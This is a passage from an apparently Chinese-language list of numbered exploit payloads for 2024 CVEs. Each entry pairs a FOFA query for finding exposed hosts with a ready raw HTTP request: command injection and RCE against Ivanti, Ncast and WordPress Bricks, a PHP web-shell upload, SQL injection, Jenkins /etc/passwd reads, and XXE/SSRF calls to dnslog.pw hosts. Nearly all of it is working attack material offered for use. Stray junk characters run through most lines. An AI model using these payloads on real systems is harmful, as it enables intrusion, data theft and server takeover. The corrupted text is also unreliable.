8 Z% t- d1 X5 M* O! q$ y* y& gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% {5 |, S7 ]+ h( a- F5 eContent-Type: application/x-www-form-urlencoded; charset=UTF-8
& S- s$ w2 k# O9 B* r, u/ JX-Requested-With: XMLHttpRequest
" O& f6 d: {2 v3 Y
& p% `6 s4 Z5 i& Aid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
6 N. @1 E& w8 Z" E6 O, n5 O) |/ K+ r, d5 Q
0 _& c- c1 n/ L/ N) y99. Ncast盈可视高清智能录播系统busiFacade RCE+ r7 E) O- h9 i8 a" x6 a
CVE-2024-0305% G: `; ~" I- W/ {0 {9 A
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
- T4 h& a/ i" x+ S! o5 ?4 |2 r% X Q. nPOST /classes/common/busiFacade.php HTTP/1.1" I$ }/ }" D* }" i0 h8 p
Host: 192.168.40.130:8080
5 k4 `! I, `) c! @# Y$ h4 B& OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" Y( Z8 L5 w. t( f/ X
Connection: close
8 X7 O& M3 Z4 X( IContent-Length: 1546 Y* L% a3 t' b/ T: \$ L
Accept: */*" g- A2 @/ C! O, B8 K) N
Accept-Encoding: gzip, deflate. Q1 j) n1 N- K2 q/ Y1 g% T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ R; T) v9 d8 U2 j9 F! b* g
Content-Type: application/x-www-form-urlencoded; charset=UTF-8# t2 M, j7 n0 `! }
X-Requested-With: XMLHttpRequest
; p o1 M" q* x. w, p9 K9 E# ]+ T( \; U5 g+ b2 q1 v
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
; H3 u) k3 G* e% w% J
8 X+ q- l, r% _) [! e' A
8 y) ^2 |0 G* B+ ]5 @+ J100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
' a9 c2 r1 w5 e' JCVE-2024-0352' z4 t: H" b( y
FOFA:icon_hash="874152924"9 H7 g+ A1 h" [% D3 F4 _' B1 D+ m
POST /api/file/formimage HTTP/1.14 }* y" H( I: r# J' f
Host: 192.168.40.130
7 |+ D5 e* h0 X- y% `' SUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.367 ^: b ~+ c$ F: e$ [# f
Connection: close
7 b( U# o/ u3 N) TContent-Length: 201
8 k* F8 W2 O$ H) D) ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
. X' m, R; Z6 r. n: r# d" ZAccept-Encoding: gzip+ [% m; a/ n. x
* S" Z+ w% v3 M4 H9 O' r
------WebKitFormBoundarygcflwtei8 Q8 u1 I% o/ N6 e
Content-Disposition: form-data; name="file";filename="IE4MGP.php"9 \( G8 `" C' Z
Content-Type: application/x-php/ Z; E/ v# ~) h# u% h1 v& Z
8 ^- ?# n: }" |: {2ayyhRXiAsKXL8olvF5s4qqyI2O9 g( x) r% _2 G( E% F4 X
------WebKitFormBoundarygcflwtei--
5 v0 t W9 \9 h: J* _6 J6 d* z- T; t3 u
% L" l" H/ K9 K# L7 f' P
101. ivanti policy secure-22.6命令注入
% u) m7 `( U* u) D$ o3 i0 ZCVE-2024-218872 o6 J# Z" }1 W0 p9 S% q6 ^
FOFA:body="welcome.cgi?p=logo"$ p2 v7 I; ]: U6 ]5 r' O4 F
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
, Z7 w1 K/ m) D. q7 S2 vHost: x.x.x.xx.x.x.x
+ U! e8 a( P" A5 V" U! yUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' N& S, C& L- V6 e
Connection: close
( _0 H; j# n4 jAccept-Encoding: gzip) N+ E7 r% D; a+ m- a4 f0 h/ l
* c9 J8 s: r4 T4 i* E
2 g" }* V& o8 R' y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行5 i2 k( R5 @* O
CVE-2024-21893+ y$ f) _( Z- P; X% @% B6 L( R
FOFA:body="welcome.cgi?p=logo"
% H7 V6 Z; Q) |0 r- a1 _POST /dana-ws/saml20.ws HTTP/1.16 H0 b! [6 Y/ X8 r7 \
Host: x.x.x.x: j2 [) T/ @# ~- s: k- [1 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% o5 c0 U7 R N
Connection: close+ G) v: a5 `; y9 S
Content-Length: 792, T; `2 y) F2 v0 q4 N/ Q
Accept-Encoding: gzip
& G! ~( u6 M. Q1 l
: y' E* r; g6 y% r4 S/ j" D6 m<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
3 [& B: k6 x; B+ ^1 H# p0 u& W1 q6 M0 L# w: d$ ~
103. Ivanti Pulse Connect Secure VPN XXE
+ U' p o+ P V5 e& cCVE-2024-22024& K; I) z+ a! {6 C
FOFA:body="welcome.cgi?p=logo"
0 M/ ^( W5 B2 k |. g8 aPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
5 R+ s9 _0 Y# c# aHost: 192.168.40.130:111
1 F+ F' u5 a, `& j/ j* SUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
( \; i7 S& x7 B- ~6 T$ _Connection: close
: ^" c4 S3 R4 A, c( Z8 o0 tContent-Length: 204$ A J" F, q, a) z0 ~
Content-Type: application/x-www-form-urlencoded
1 W+ j: q8 [' R& |' W: x2 cAccept-Encoding: gzip/ e' z2 T$ |! {) X" n/ ~
) D1 w4 \; R( C) |7 m) F
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==, N% |5 o l' a% v& a8 p, [: D
" t! p& ~3 \; Q. v" w( P! R( [$ V
3 l9 \; D) n+ g
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下+ n( C, Z* C6 n) |$ X( |) c
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>9 F! U' ^, H$ k
. T7 O' @% p; R6 A0 @
' r# I4 v1 Q+ p$ k6 f( c
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露% p" d& t: }) P ^
CVE-2024-05693 L. j- f+ f: b; j" b; g, D* G
FOFA:title="TOTOLINK"+ P o8 S, {1 E c# B
POST /cgi-bin/cstecgi.cgi HTTP/1.1
& M2 j) W0 N6 i/ l/ ^Host:192.168.0.1/ u% Z/ y) z4 k) h/ E
Content-Length:41
8 T& z5 q r2 b9 m5 L( R; F2 R6 }Accept:application/json,text/javascript,*/*;q=0.01
9 t" G. g0 x; f' I# {$ P J3 ^X-Requested-with: XMLHttpRequest D, s- Z: B" r ]- C z2 R5 U
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36! t" O& ~0 U3 [$ U' V5 g
Content-Type: application/x-www-form-urlencoded:charset=UTF-82 G+ J5 i; Z" ^) H
Origin: http://192.168.0.1
$ |* _5 X4 m; {. D; q( M5 R' wReferer: http://192.168.0.1/advance/index.html?time=1671152380564
, E2 X3 j v; P) J- PAccept-Encoding:gzip,deflate$ x$ U- f8 C+ ]& `. q" d; f
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
+ F+ y* y. @( b' Z4 v' n: d* p0 rConnection:close
) o. x/ _% i7 b6 f2 n, F8 v2 b. H5 w) ^: M# g* K* Z" a
{
( m8 a# B) _: d" m"topicurl":"getSysStatusCfg",
; j9 o- {/ f! V8 V& f"token":""
" }- c V W6 n' P6 L3 X}
( w9 v& ~3 p* ]6 `5 u' _3 y. W, a) l& U l9 x& z3 [
105. SpringBlade v3.2.0 export-user SQL 注入
/ t5 V, X3 E6 i" T+ cFOFA:body="https://bladex.vip". e: L$ A F- e; i# u L
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
$ X7 [' J& a& ~+ L* A
9 H/ \& p7 a% |, L4 M- L% O! Q106. SpringBlade dict-biz/list SQL 注入
" W* w8 _4 b! O2 h9 V ?' {, TFOFA:body="Saber 将不能正常工作"3 S& m( a+ E$ @+ l$ K! B
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1$ W% U& x3 y+ `
Host: your-ip
% Q6 V, j$ ?# t, X6 r. u o: zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% E; h E8 o" b+ h$ r% bBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
1 J/ c( p- d7 y6 o. n( @ m' _/ BAccept-Encoding: gzip, deflate2 ?2 |6 d$ e" N0 M! w4 d& ]: f+ T
Accept-Language: zh-CN,zh;q=0.9
7 s' R3 k; j6 f. G9 i& tConnection: close" z4 u; x$ x, K0 u
$ J8 b" U1 ^0 ?' z! V; Q: I) t3 P# m# M
107. SpringBlade tenant/list SQL 注入. E) ^& b7 s) |. C. }& h8 V) G
FOFA:body="https://bladex.vip"
. V4 o6 h# x$ x& K* A% d9 y4 yGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
- f9 y% P7 A: R- NHost: your-ip7 r% {( V& L" U, Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 B4 g E5 L% w$ A+ gBlade-Auth:替换为自己的4 R: V: N+ z. D; x5 L0 C/ o X
Connection: close
: Y' N4 z8 U+ Z5 r$ A% d/ Q3 H+ L1 G# O3 g1 W
' ^2 P$ z8 {9 n1 G
108. D-Tale 3.9.0 SSRF
/ A, ?3 ^2 r! F2 F0 YCVE-2024-21642
+ C- ?! y9 Z/ A0 S$ A- C. m7 Z3 QFOFA:"dtale/static/images/favicon.png": ]9 Z& K2 q n9 j
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1% U0 P. } k0 T; _6 |
Host: your-ip
7 m3 N( `, Y! JAccept: application/json, text/plain, */*
: n, x& c: _7 T. [7 B0 E5 ~; nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 S6 z$ `2 M. v* c1 M" H; w& C
Accept-Encoding: gzip, deflate Z9 N' Q |7 G2 i1 n4 F( U
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
q: V/ y& O4 jConnection: close
; }& {- L8 ^$ O2 S' M5 j: j* ^
5 R8 N0 x! C- Z9 l
* u4 W% u' T4 T {# ]109. Jenkins CLI 任意文件读取
. U4 N! G7 ?5 S7 L1 I; x- T( w4 H* t# LCVE-2024-23897
/ j; \) L. j7 H9 ]0 [1 a3 kFOFA:header="X-Jenkins". H* x/ s5 j4 k7 ^: o3 C8 W1 E1 {+ G
POST /cli?remoting=false HTTP/1.1! ^2 f+ G$ t; n0 f# I( c1 {
Host:
$ \* A K" W- s' i$ ^" }Content-type: application/octet-stream6 V9 l; F2 [/ l8 V7 C! n
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
; d2 n9 Z+ r2 Q: b; r4 a2 ?, z7 JSide: upload
. ^" l: O7 w; P6 ^- u! RConnection: keep-alive
" ?; Z+ e4 `6 LContent-Length: 163 J4 ^+ O. t8 ?$ j& n! t
: A0 w6 b o$ @! O3 {6 }3 u2 n% a
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
% h$ B; i, G8 P: @4 K0 i$ i6 R3 ^3 r$ H5 N4 G) f- D
4 x" i4 g( }* v0 H! V
POST /cli?remoting=false HTTP/1.1 M' u4 [, K$ d
Host:
& G# C& p# x* q/ R |5 nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 w- i8 I, X& F+ g$ k2 I* e. N
download: d9 [4 M4 e3 _$ c' Q- J1 _
Content-Type: application/x-www-form-urlencoded
E* B% J7 b0 @$ j7 P N; }4 UContent-Length: 0
( N) ^! R0 R4 j6 l# Y2 k/ j" N* L/ [! a; X
+ _% ^5 ~& P* EERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
) K Y T) ~& v% T# _/ b1 ojava -jar jenkins-cli.jar help! Q: t. _; q3 Q& g: u% N: L
[COMMAND]
2 U5 g6 I& l6 f9 h; S( HLists all the available commands or a detailed description of single command.
$ e: q/ a5 J: U+ V COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash); \) Q+ s' i+ ~( N8 ?
( P3 S0 q% I0 G" B3 E; p$ k, p( A% m2 U
9 y. r9 C8 p9 F: h110. Goanywhere MFT 未授权创建管理员
, @ [5 h7 l7 j- f) YCVE-2024-0204
' r% D: H' {3 j# i/ z9 Q( HFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
- d- t* I2 }, }, R' HGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
$ v% E. L2 J8 u' p- W) ^Host: 192.168.40.130:8000
' C9 N5 S1 l6 B/ QUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36! \8 c1 d2 a3 ~, O$ z
Connection: close
. x# j; `! I( k) o9 E, [9 k7 zAccept: */*+ ^! G5 V( ^. q9 P' ^
Accept-Language: en$ O7 a* B4 g0 a2 l& B
Accept-Encoding: gzip" C% l) M+ \1 x( g' T3 z- b/ k
j* A, j( z* U* o b; V4 Y
( C, b. R* ~1 k+ G111. WordPress Plugin HTML5 Video Player SQL注入
' F: [2 U* h: ~2 KCVE-2024-1061
" T) t' Q! A7 a9 M: ^: @9 nFOFA:"wordpress" && body="html5-video-player"
: m' ?, p y: |7 ~6 yGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
$ T0 L2 B4 O9 f2 E' [Host: 192.168.40.130:112( g" \ y/ u" W* V- K+ y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 h5 U+ Q' h' q4 z; _5 N5 L7 aConnection: close4 j) f5 @- W* c1 S& Z" j! D0 L
Accept: */*
L$ d5 D) s [: _2 C8 q( AAccept-Language: en
) \: h# e+ V5 G) o& lAccept-Encoding: gzip: u7 a* C+ e2 B" |' u C
+ k7 \- `+ }1 q' b! d0 n" f8 R i8 ]
/ Q; @3 q/ l) Y6 Y3 W
112. WordPress Plugin NotificationX SQL 注入
( q" d6 d I2 c" mCVE-2024-1698$ b+ P7 @: l5 l* M' e9 Z! Q! P
FOFA:body="/wp-content/plugins/notificationx"$ G+ w/ P$ z' W r
POST /wp-json/notificationx/v1/analytics HTTP/1.1
% @' U" J L& Q- t k7 V* y" S& i/ yHost: {{Hostname}}' J" `9 T% S, m9 c
Content-Type: application/json
3 v$ J( w$ F; h+ m8 W/ Y3 V
- F' o9 Y1 \ P% _$ u5 L. p& |7 }{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}4 t; `7 R# r' J& {2 ^
: D! ^+ j4 J& l: A* e% y, [
- h# K W1 J( \- B2 a. r) ?9 u113. WordPress Automatic 插件任意文件下载和SSRF$ x* M! u; X! c" r, D
CVE-2024-27954
, }. m4 E' G6 M1 `# Y1 M& {8 o" n* MFOFA:"/wp-content/plugins/wp-automatic"
0 e- `( e& e) q X8 vGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1) m$ c8 z; ~3 _+ y; I, K3 x
Host: x.x.x.x
: V; ^: M( ]1 U" mUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
1 U; _0 h& T, m4 p, I" W, {, lConnection: close; u% c% _' L5 X% z- w
Accept: */*
( y. q; g- w, K! P9 iAccept-Language: en ?2 {/ K/ l+ o' t( l* N$ q- c
Accept-Encoding: gzip
9 s3 P) p2 N$ m2 N+ V- i4 v3 J( E; R: j0 J# |9 z* U% g
# T2 P$ f) f0 J+ M
114. WordPress MasterStudy LMS插件 SQL注入
0 i2 C" S6 t2 n2 l9 B J5 gFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"& A* k0 i% Z# L
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
0 z( T, s" D$ ~$ I( Z6 IHost: your-ip
* a+ P( }# m, SUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 C f, U; Y' f' fAccept-Charset: utf-85 }1 j3 p5 b% W$ _8 x4 m* p& Q
Accept-Encoding: gzip, deflate
) E( k, X; s) N8 w1 xConnection: close
* y: \0 y4 _6 Q3 S+ s2 E0 T3 T5 Z) V* S8 L, e
h1 |' Y0 O$ o) J2 B
115. WordPress Bricks Builder <= 1.9.6 RCE
: {: @& O+ _1 D! kCVE-2024-256005 H# j* [; [3 `" B/ L' B- d
FOFA: body="/wp-content/themes/bricks/"7 k, o. U, ~# U, Q# O2 W0 B' o& q7 K, \
第一步,获取网站的nonce值
3 U" J+ R' ~; j. TGET / HTTP/1.1
3 _8 h- s! S U' K& L7 AHost: x.x.x.x
1 X5 U! x; x! {User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.365 {/ |+ y7 ^! a1 g0 O" u- x
Connection: close
3 v# J3 ^+ T# a1 Z W7 o% qAccept-Encoding: gzip
7 n& W3 {+ J* b% S& U0 v! ?0 Y( |( O$ K
" L P- ]4 c: R6 L' F) t
第二步替换nonce值,执行命令
' P4 ^# d/ U0 t4 R; G CPOST /wp-json/bricks/v1/render_element HTTP/1.1. j+ }2 L: c+ ]
Host: x.x.x.x8 C0 B3 C4 K w" D! s# f0 Q3 Z( N/ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 I' ~! Z$ ]7 v6 l# p% SConnection: close1 R. I1 n8 O7 z8 g6 f$ I
Content-Length: 356
0 o. U/ n4 y2 ^7 u: ^, a+ |Content-Type: application/json
+ _0 m. M/ [, z `) `: b9 @Accept-Encoding: gzip* w" f& |7 A- U; x
( Y% y! X7 }! z! w% V{! C- d3 v3 T& B9 R8 E' v' Y. y8 ~
"postId": "1",
r" w7 g9 V0 S9 n; C "nonce": "第一步获得的值",
4 r0 V$ F* \3 e1 B( T5 Q7 U0 V "element": {8 y% [4 m2 F3 y& {0 W1 t
"name": "container",
7 @2 f* F" c) n7 V "settings": {
* t# h* t; `9 Y$ A. `1 a2 j l. @ "hasLoop": "true",
5 N, n, U6 Z' ^9 l# w W "query": {
# L" L9 I0 ~ Z" k( T2 n& k "useQueryEditor": true,. @- l' O& w: F
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",6 ]! P. [. E7 m, S6 A! V
"objectType": "post"
& R2 y* \/ {# R/ R6 A7 }) i) V }/ j- U8 z3 P1 A0 x+ W0 Y& Y
}
& j! v5 I) r/ F3 w, b }
[7 s" ?+ M4 W/ _+ X. K" V" n}/ d5 o. c! j; s# V2 U3 Z
) u: N1 I) D( |+ t+ o# c
! N" `: M$ e# x0 `
116. wordpress js-support-ticket文件上传) V/ K! Q8 G: J. t$ ?; }
FOFA:body="wp-content/plugins/js-support-ticket"
3 q2 T8 T- F/ y) FPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
0 r& {7 y: J X7 c( YHost:$ }( a" I/ @! H5 }& i
Content-Type: multipart/form-data; boundary=--------767099171
2 Z- g" `+ a. x }4 |# X4 r7 E' cUser-Agent: Mozilla/5.02 `2 D2 ?4 c5 P& e
+ b3 V) Z8 {( A" k----------7670991718 X" _, q+ ~6 o/ A, Z
Content-Disposition: form-data; name="action": m$ Y3 ]* b( {& L }9 J- C
configuration_saveconfiguration; z- f/ f( ?2 L7 v2 q8 p
----------767099171# l$ J9 ^7 g$ C5 y8 }; w
Content-Disposition: form-data; name="form_request"9 A$ e9 b! ~% A( t- E
jssupportticket4 X$ N! g. X4 j6 ] T3 Q8 j
----------767099171
& k3 Q8 ~7 X: G$ VContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
4 t( V9 m- D, e2 yContent-Type: image/png
! H3 k1 i* R. `( w* \3 q& }----------767099171--/ `( ~ v/ l) [8 N; D+ d
8 E. n7 B# \1 R5 E% M$ r
2 q" L* a" {1 f. J, X6 a; z* ~
117. WordPress LayerSlider插件SQL注入
0 D D( E; e9 m4 h: n7 ~version:7.9.11 – 7.10.0
; j& B/ g6 i" Q" q/ yFOFA:body="/wp-content/plugins/LayerSlider/"; q1 \2 _! V$ l7 v( M1 c
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.19 J, Z) B6 L3 L0 s8 {
Host: your-ip( g' k; y' e9 O" Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. L1 }* [% w% O2 `% k0 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 ]( ~/ _( t6 |& M2 @5 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! r5 ]3 ~4 J) g% I1 a9 o& SAccept-Encoding: gzip, deflate, br
9 i9 C& ~+ ^% o0 N0 F# e( J' GConnection: close
4 `0 B1 `. n$ I8 S! R, \* c! CUpgrade-Insecure-Requests: 1: w! ]- g1 W( g. v) t
( J2 c2 }9 g, g' d
" L3 N/ K' b. C: i118. 北京百绰智能S210管理平台uploadfile.php任意文件上传1 Y: W3 W# ~$ `: d
CVE-2024-0939# P- Q% s2 ?$ _
FOFA:title="Smart管理平台"9 B( {! k+ x, S/ P) E( N
POST /Tool/uploadfile.php? HTTP/1.1" z; C3 M* ^$ B1 I1 e" ?' M
Host: 192.168.40.130:8443
. i4 a9 q0 h2 {! W2 d- pCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
6 Q( y* Z [. n2 y! v. cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0) L$ d% ~5 i+ r2 ?& y# ?6 Y$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# O6 `& I% \7 ?3 R) T& wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 f1 `$ } ]* {: [. T$ QAccept-Encoding: gzip, deflate
' W( y& k8 p1 g9 c8 {" i- _/ \9 kContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
" o1 a6 B# u2 ^; L% i* pContent-Length: 405
- I3 S D* c7 v: {+ SOrigin: https://192.168.40.130:84435 C# M( M* i8 h! R% d5 K; d( D+ V
Referer: https://192.168.40.130:8443/Tool/uploadfile.php+ s5 z/ x. |: y9 n6 C. t
Upgrade-Insecure-Requests: 1
/ a, w, X' q- S9 L8 ZSec-Fetch-Dest: document5 w; f* o% @) w8 x) x
Sec-Fetch-Mode: navigate
9 N4 M/ D5 @6 ?- H- W# Z, pSec-Fetch-Site: same-origin
1 E* r5 l# T% u3 l9 lSec-Fetch-User: ?1
' X/ @) l y, p3 ETe: trailers; l6 J3 D- I0 C. `
Connection: close4 p) c9 _2 Z! w# b, N1 d+ f+ ^
( X7 m2 P! }0 e9 S
-----------------------------13979701222747646634037182887
3 L# O' a% H2 W) z! MContent-Disposition: form-data; name="file_upload"; filename="contents.php" v( h% {4 U2 ?$ L
Content-Type: application/octet-stream
2 e( i0 q5 F2 U1 E# v! A+ h0 A# d M7 }: K* |
<?php6 z, R' I+ g' H9 ~
system($_POST["passwd"]);+ Y4 G' m' Z, U0 d1 y
?>
+ |' _3 G* K, i4 F2 s! q, _$ U-----------------------------13979701222747646634037182887
9 |' k9 s3 s; ^/ a+ pContent-Disposition: form-data; name="txt_path"5 s1 Q( p7 _7 C% @
- I L% }# D( v8 t) |0 s/home/src.php7 {; {; B- i% K# ?
-----------------------------13979701222747646634037182887--
4 \3 b: G O5 x' p6 N4 [" o1 p# E% F8 T' ~& `% Y3 J
# B2 Q1 a+ P3 |6 Y
访问/home/src.php2 q3 c( ~1 J* P. s* a
% i0 r9 ^3 P# |- M119. 北京百绰智能S20后台sysmanageajax.php sql注入" y: t4 ~7 k/ _5 v. K6 A- r
CVE-2024-1254
- I$ x1 ?( E" U- _% BFOFA:title="Smart管理平台"4 L9 L: m5 f; L7 j7 V$ `; _7 D3 i
先登录进入系统,默认账号密码为admin/admin
5 X: O3 R' d6 j- B5 x- `POST /sysmanage/sysmanageajax.php HTTP/1.11" y' v d z9 j$ M# R$ T
Host: x.x.x.x! c! ^4 }" E: X0 K; P- q
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee* H; J I* m0 m7 d( R% f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
' Y# p- C% k9 H/ FAccept: */*! C8 R; f2 H* I7 i+ _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' w5 x3 c' b* z: f5 \
Accept-Encoding: gzip, deflate8 Q. v- Y- E$ ~ J- y: t5 p
Content-Type: application/x-www-form-urlencoded;. W* _* `7 T- L ?
Content-Length: 109# l L& o( ?. s# N
Origin: https://58.18.133.60:8443
5 H4 l3 a* B2 S% E) iReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
# Z$ V! E- S3 f) L1 z4 n* o: USec-Fetch-Dest: empty9 s" y9 z; W9 N! J5 l+ e7 `' G
Sec-Fetch-Mode: cors& ^" `9 @# p0 J) n3 t. @5 @
Sec-Fetch-Site: same-origin
+ g: Z8 g/ `& c: Q# \1 G* t: f* `$ fX-Forwarded-For: 1.1.1.1
; @- x5 M- o3 @$ m* f G. }8 A) ZX-Originating-Ip: 1.1.1.1
